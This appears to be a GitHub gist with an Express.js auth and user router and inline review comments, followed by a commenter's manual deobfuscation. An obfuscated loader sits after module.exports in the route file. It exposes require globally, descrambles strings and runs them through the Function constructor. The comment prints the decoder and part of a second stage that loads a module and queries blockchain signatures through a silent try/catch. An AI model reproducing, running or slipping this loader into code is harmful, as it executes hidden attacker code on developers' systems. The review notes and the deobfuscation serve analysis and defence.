// Router for the auth and user endpoints. Routes registered before
// router.use(authController.protect) run without that middleware; every
// route registered after it passes through it first.
| const express = require("express"); | |
| const authController = require("../controllers/authController"); | |
| const userController = require("../controllers/userController"); | |
| const transactionController = require("../controllers/transactionController"); | |
| const router = express.Router(); | |
// NOTE(review): no rate-limiting middleware is visible in this file for the
// verification-code, signup, login and password-reset routes; confirm that
// throttling is applied in the controllers or upstream.
| router.post("/getVerifyCode", authController.getVerifyCode); | |
// check2FACode runs before signUp, as registered here.
| router.post("/signup", authController.check2FACode, authController.signUp); | |
| router.post("/login", authController.logIn); | |
// NOTE(review): logout is a GET and sits before the protect middleware. If
// logOut changes session state, a GET can be triggered by a cross-site
// request; confirm this is acceptable or switch the route to POST.
| router.get("/logout", authController.logOut); | |
// NOTE(review): reachable without protect; confirm it cannot be used to
// enumerate accounts.
| router.post("/getAccountName", authController.getAccountName); | |
| router.post( | |
| "/getVerifyCodeForPasswordReset", | |
| authController.getVerifyCodeForPasswordReset | |
| ); | |
// resetPassword only runs after check2FACode, as registered here.
| router.post( | |
| "/resetPassword", | |
| authController.check2FACode, | |
| authController.resetPassword | |
| ); | |
| // Protect all routes after this middleware | |
| router.use(authController.protect); | |
// Both of the next two routes run checkTransactionKey before their handler.
| router.patch( | |
| "/upgradeUserTier", | |
| transactionController.checkTransactionKey, | |
| userController.upgradeUserTier | |
| ); | |
| router.patch( | |
| "/updatePassword", | |
| transactionController.checkTransactionKey, | |
| authController.updatePassword | |
| ); | |
| router.get( | |
| "/getVerifyCodeForTrxKeyUpdate", | |
| authController.getVerifyCodeForTrxKeyUpdate | |
| ); | |
// updateTrxKey only runs after check2FACode, as registered here.
| router.patch( | |
| "/updateTrxKey", | |
| authController.check2FACode, | |
| userController.updateTrxKey | |
| ); | |
| router.post("/submitMessage", userController.submitMessage); | |
// getMe runs first, then getUser.
| router.get("/me", userController.getMe, userController.getUser); | |
| // router.patch('/updateMe', | |
| // // userController.uploadUserPhoto, | |
| // // userController.resizeUserPhoto, | |
| // userController.updateMe | |
| // ); | |
| // router.delete('/deleteMe', userController.deleteMe); | |
| module.exports = router; | |
// NOTE(review): nothing from this line on belongs to the router. It follows
// module.exports and has no connection to routing: it publishes Node's
// require() as the global `r`, sets the global `_V`, and declares a0b/a0a,
// which the decoded payload shown further down this page reads and assigns.
// The IIFE after these lines permutes its string literals with efW(), looks
// up efW[WnE] (WnE is an 11-character property name, apparently
// "constructor", which on a function is the Function constructor) and calls
// the function built from the resulting text.
// Treat a block like this in a route file as injected code: keep the project
// from being started until it is removed, and review how it entered the
// repository.
| global["_V"] = 3; | |
| global["r"] = require; | |
| var a0b, a0a; | |
| (function () { | |
| var FHK = "", | |
| siK = 153 - 142; | |
// efW(z): returns the characters of z in a permuted order. The swap sequence
// depends only on z.length and the fixed seed below, so a given input always
// produces the same output. The surrounding IIFE passes each of its string
// literals through this function before using them.
| function efW(z) { | |
// Seed of the swap sequence; it is replaced at the end of every round.
| var c = 2169898; | |
| var j = z.length; | |
| var r = []; | |
// Copy the input into an array of single characters.
| for (var o = 0; o < j; o++) { | |
| r[o] = z.charAt(o); | |
| } | |
// One swap per input position: two indices are derived from the seed and the
// round number, reduced modulo the length, and the characters exchanged.
| for (var o = 0; o < j; o++) { | |
| var u = c * (o + 131) + (c % 36206); | |
| var t = c * (o + 741) + (c % 16120); | |
| var m = u % j; | |
| var q = t % j; | |
| var k = r[m]; | |
| r[m] = r[q]; | |
| r[q] = k; | |
| c = (u + t) % 5158178; | |
| } | |
| return r.join(""); | |
| } | |
| var WnE = efW("vtcstlojqptkbdrfoncuurgmnarihczoxweys").substr(0, siK); | |
| var KOo = | |
| 'aa{ 9={1nk(2o,==+4+vjroak"1b]d-fah!jyl=nxptr=t.vrx,z);la" t=f9a,,9e7r,=8-80,=5r89,i467p,e2s7),i648h,(6,8=,d9,7+,q0r88,=5 ;}ar A=n];ftrgvhrett0atan.ldnftp;C+g)r[{[c]g=[+r;aa; j=6]nqu=)2lk)=[6rs;=<2af8rxv.r[wl0ewvangom+nvswl)n tt;.+{)(v6rhj3a=gim.nnslw;.)pris(h +)1f=rdvrrqhuj.l*n]t -h;v>]0rh{-1{+aa p= u)lvvfrtcnj4hu;=a= =guvl;v(rad[0"vsrrv=crltnrti;(ao 1;oo.(xa+ u= ;]<};.+p)(v-rrg1ckc(a4Cvd[A,(<)cv=rho2bhgr;)flot{)=ror12*6+5.1h]rCocemtSr.1x-(;(=r;=+[;ee=s( 0f0g(=d)jp;kv(i.uengnh)qpc.csa]Cod7Ax(s+[)=+l.0h.raovertlr12+-m;)= ;g+)2a}vl;e+canyieu(;,iu(u=ennl3)e=e];il(c>t)t.7u"hrc.s6bpt7itghdilm)0x,p,si(=[i+t]f;i=r+a;;ib([!)nllf)aih(.<;)o.)uth.c slbqteilgrdt)ejohu=;.to+n("0);}0yrprsc(+[w]C;vvfrCuty+jvi;(g"};oa ;=s3r,82,1A,s9l9.,[2s.po;c;tnn[;"ax r=ctri,g(frotC(arCjd((,62;fov(xah ==o;b<r.derg6h)tn+(u,u snl)t(m;a]crajA1( )v.+oen)Sar}nh.7rim,hir;ose=i6t")r;;eduaneu7srl(t]mq"n"}.uo)n m;;'; | |
| var GYz = efW[WnE]; | |
| var ute = ""; | |
| var kNz = GYz; | |
| var TVg = GYz(ute, efW(KOo)); | |
| var zQb = TVg( | |
| efW( | |
| '6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. 
Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v' | |
| ) | |
| ); | |
| var its = kNz(FHK, zQb); | |
| its(2713); | |
| return 6659; | |
| })(); |
metacritical
commented
Dec 28, 2024
After Beautification, this has syntax errors:
var q = 11,
k = 27,
s = 64;
var a = "abcdefghijklmnopqrstuvwxyz";
var n = [90, 79, 70, 88, 81, 65, 85, 94, 74, 72, 71, 86, 80, 66, 82, 89, 76, 60, 87, 75];
var b = [];
for (var t = 0; t < n.length; t++) b[n[t]] = t + 1;
var y = [];
q += 22;
k += 66;
s += 32;
for (var w = 0; w < arguments.length; w++) {
var j = arguments[w].split(" ");
for (var h = j.length - 1; h >= 0; h--) {
var p = null;
var c = j[h];
var x = null;
var d = 0;
var v = c.length;
var l;
for (var r = 0; r < v; r++) {
var g = c.charCodeAt(r);
var o = b[g];
if (o) {
p = (o - 1) k + c.charCodeAt(r + 1) - q;
l = r;
r++;
} else if (g == s) {
p = k(n.length - q + c.charCodeAt(r + 1)) + c.charCodeAt(r + 2) - q;
l = r;
r += 2;
} else {
continue;
}
if (x == null) x = [];
if (l > d) x.push(c.substring(d, l));
x.push(j[p + 1]);
d = r + 1;
}
if (x != null) {
if (d < v) x.push(c.substring(d));
j[h] = x.join("");
}
}
y.push(j[0]);
}
var u = y.join("");
var i = [32, 42, 10, 39, 96, 92].concat(n);
var m = String.fromCharCode(46);
for (var t = 0; t < i.length; t++) u = u.split(m + a.charAt(t)).join(String.fromCharCode(i[t]));
return u.split(m + "!").join(m);
After fixing the syntax error:
function decoder(arguments) {
var q = 11,
k = 27,
s = 64;
var a = "abcdefghijklmnopqrstuvwxyz";
var n = [90, 79, 70, 88, 81, 65, 85, 94, 74, 72, 71, 86, 80, 66, 82, 89, 76, 60, 87, 75];
var b = [];
for (var t = 0; t < n.length; t++) {
b[n[t]] = t + 1;
}
var y = [];
q += 22;
k += 66;
s += 32;
for (var w = 0; w < arguments.length; w++) {
var j = arguments[w].split(" ");
for (var h = j.length - 1; h >= 0; h--) {
var p = null;
var c = j[h];
var x = null;
var d = 0;
var v = c.length;
var l;
for (var r = 0; r < v; r++) {
var g = c.charCodeAt(r);
var o = b[g];
if (o) {
p = (o - 1) * k + c.charCodeAt(r + 1) - q;
l = r;
r++;
} else if (g == s) {
p = k * (n.length - q + c.charCodeAt(r + 1)) + c.charCodeAt(r + 2) - q;
l = r;
r += 2;
} else {
continue;
}
if (x == null) x = [];
if (l > d) x.push(c.substring(d, l));
x.push(j[p + 1]);
d = r + 1;
}
if (x != null) {
if (d < v) x.push(c.substring(d));
j[h] = x.join("");
}
}
y.push(j[0]);
}
var u = y.join("");
var i = [32, 42, 10, 39, 96, 92].concat(n);
var m = String.fromCharCode(46);
for (var t = 0; t < i.length; t++) {
u = u.split(m + a.charAt(t)).join(String.fromCharCode(i[t]));
}
return u.split(m + "!").join(m);
}
I don't know what was used to obfuscate this code, so I had to deobfuscate it manually. Manually deobfuscating the code was an incredibly challenging and time-consuming task due to its advanced obfuscation techniques. The heavy use of nested logic, dynamic code execution, and cryptic split-join operations made it difficult to trace the code's intent. Each variable and function reference had to be carefully reversed, tracked, and pieced together. It took patience, persistence and time to decode every layer manually. In the end, I got the result that I wanted. :)
So, it all starts with this string:
'6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. 
Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v'
After decoding it we get:
// Indirection helpers (apparently emitted by the obfuscator). Each one either
// applies a single operator to its arguments or hands back a global/builtin,
// so the rest of the code never spells those out directly. The numeric
// suffixes match the character codes of the operator: 45 is "-", 43 "+",
// 37 "%", 47 "/", 60 "<", 33 "!", 61 "=". The "giden" helpers return the
// identifier in their name (48 is "0", so a_48a is a0a and a_48b is a0b).
function jso$ft$boe$_45(a, b) {
return a - b
}
function jso$ft$giden$a_48a() {
return a0a
}
// Returns the builtin base64 decoder; see where the caller applies it.
function jso$ft$giden$atob() {
return atob
}
// Returns the Node global object, on which the gist stored `r` (require).
function jso$ft$giden$global() {
return global
}
function jso$ft$uoel$_33(a) {
return !a
}
function jso$ft$boe$_61_61(a, b) {
return a == b
}
function jso$ft$boe$_61_61_61(a, b) {
return a === b
}
function jso$ft$giden$parseInt() {
return parseInt
}
function jso$ft$boe$_47(a, b) {
return a / b
}
function jso$ft$giden$a_48b() {
return a0b
}
function jso$ft$giden$String() {
return String
}
function jso$ft$boe$_37(a, b) {
return a % b
}
function jso$ft$boe$_43(a, b) {
return a + b
}
function jso$ft$boe$_60(a, b) {
return a < b
}
var _$_815b = (_$af1949887)("N4i31W9in%nnfn%Gcz%ieMsd%ed%9t%c%88%pDser%E_Ft%r%clthbCm%wt8mg%iLofij%%thm5iwlgc%st%G0irRPeh%We%ldmPon%;%hUf4E%ttro%hFldbeRuvay8CFye%-%ntiNmr%%hu%%8tr g%UaA%nn%cBP%tpYAV_SoRodi%swBNiZiu%%Wy_npsVJKnp9l90p6XcWQTIiM2nvO%S5eu%f3R%l9e%UHSoeiqrof%.wsoete8sTpWyVHecr%za1lcs%UbrcaeilFne%dtMnup2clRc5r3lj%-gsaj%Da\'ycTSD38nso2%upiuA%56tSeB%@m$og%m/ntYnHL%w6seGaaweeeoiY1TDuthdac11nBi%V89tbs1rjr1oCsD0e]s2fgH%%nl%%\'PCtxStm7r%fK450%Udwe%z[aI8saxpUb%urt YGeZJ=7CS1h%tq4uso%Ehgg4piAu1h%o%mHo", 2169898);
if (!_$_815b) {
_$af1949883(0, true);
(function() {
_$af1949876 = null
})()
};
// String-table decoder. Permutes the characters of b with a seeded swap
// sequence (the same offsets and moduli as efW in the gist: 131/741 and
// 36206/16120/5158178), then splits the result into an array of strings.
// b: scrambled text; jso$setrpl$o: numeric seed.
// Returns the array that the rest of this stage indexes as _$_815b[n].
function _$af1949887(b, jso$setrpl$o) {
// Every local is boxed in an object with a single `_` property.
var o = {},
e = {},
h = {},
y = {},
t = {},
m = {},
f = {};
o._ = jso$setrpl$o;
var v = b.length;
e._ = [];;
// Copy the input into an array of single characters.
for (var w = 0; jso$ft$boe$_60(w, v); w++) {
e._[w] = b.charAt(w)
};
// One swap per position; the three helper calls do e[t] = e[m], e[m] = f
// and seed = (h + y) % 5158178.
for (var w = 0; jso$ft$boe$_60(w, v); w++) {
h._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 131)), (jso$ft$boe$_37(o._, 36206)));;
y._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 741)), (jso$ft$boe$_37(o._, 16120)));;
t._ = jso$ft$boe$_37(h._, v);;
m._ = jso$ft$boe$_37(y._, v);;
f._ = e._[t._];;
jso$spliter_$af1949890(t, e, m);
jso$spliter_$af1949891(m, e, f);
jso$spliter_$af1949892(o, h, y)
};
// "%" separates the table entries. It is first swapped for character 127 so
// that the escapes "#1" (a literal "%") and "#0" (a literal "#") can be
// expanded before the final split.
var k = jso$ft$giden$String().fromCharCode(127);
var s = '';
var d = '%';
var c = '#1';
var q = '%';
var x = '#0';
var l = '#';
return e._.join(s).split(d).join(k).split(c).join(q).split(x).join(l).split(k)
}
function _$af1949875(a, b) {
const l = jso$ft$giden$a_48b(),
c = a();
while (!jso$ft$uoel$_33([])) {
try {
const d = jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x84)), 0x1) + jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x91)), 0x2), jso$ft$giden$parseInt()(l(0xa6)) / 0x3) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x8f)), 0x4), jso$ft$giden$parseInt()(l(0x9b)) / 0x5) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x96)), 0x6), jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x98)), 0x7) * (jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0xa2)), 0x8)));
if (jso$ft$boe$_61_61_61(d, b)) {
break
} else {
if (jso$ft$boe$_61_61(_$af1949875, 1)) {
jso$spliter_$af1949893();
return
};
c[_$_815b[1]](c[_$_815b[0]]())
}
} catch (e) {
c[_$_815b[1]](c[_$_815b[0]]())
}
}
}
// Main routine of this stage. Every module, property and string name is
// fetched from the string table (_$_815b, or the a0b accessor held in m._),
// so nothing readable appears here; the names quoted in the comments below
// are the ones given in the resolved version later in this write-up.
function _$af1949876() {
var m = {},
b = {};
m._ = jso$ft$giden$a_48b();;
// b._ holds the constants for the calls below: strings put together from
// table entries, plus small wrappers for ==, +, === and "call c with d".
b._ = {
'BCmTg': (1 && m._)(0x82),
'cdtYB': function(c, d) {
return jso$ft$boe$_61_61(c, d)
},
'YevWJ': function(c, d) {
return jso$ft$boe$_43(c, d)
},
'GhmHo': function(c, d) {
return jso$ft$boe$_61_61_61(c, d)
},
'UYffz': _$_815b[2],
'Dline': _$_815b[3],
'wPfjh': jso$ft$boe$_43((1 && m._)(0x88), (1 && m._)(0x92)),
'cDuFh': _$_815b[4],
'nxpqH': (1 && m._)(0x83),
'tURKT': function(c, d) {
return c(d)
},
'xDLfg': jso$ft$boe$_43((1 && m._)(0x9c), (1 && m._)(0x93)),
'yVpzy': jso$ft$boe$_43((1 && m._)(0x89), _$_815b[5]),
'RtuiH': (1 && m._)(0x9f),
'IRuMw': jso$ft$boe$_43(jso$ft$boe$_43((1 && m._)(0x8c) + _$_815b[6], (1 && m._)(0x94)) + (1 && m._)(0x90), _$_815b[7])
};;
// The whole body sits in try/catch with an empty handler, so any failure is
// silent.
try {
// c is whatever a function stored on `global` returns for a table string
// (presumably the `global.r` = require alias loading '@solana/web3.js').
const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
d = {};
// d gets one property set to 0x14 (20). The long expression then has the
// shape new c.X(c.Y(..), ..).method(new c.Z(..), d, ..) and ends in two calls
// shaped like .then(callback) and .catch(() => {}); the write-up resolves it
// to a Connection, getSignaturesForAddress, a PublicKey and { limit: 20 }.
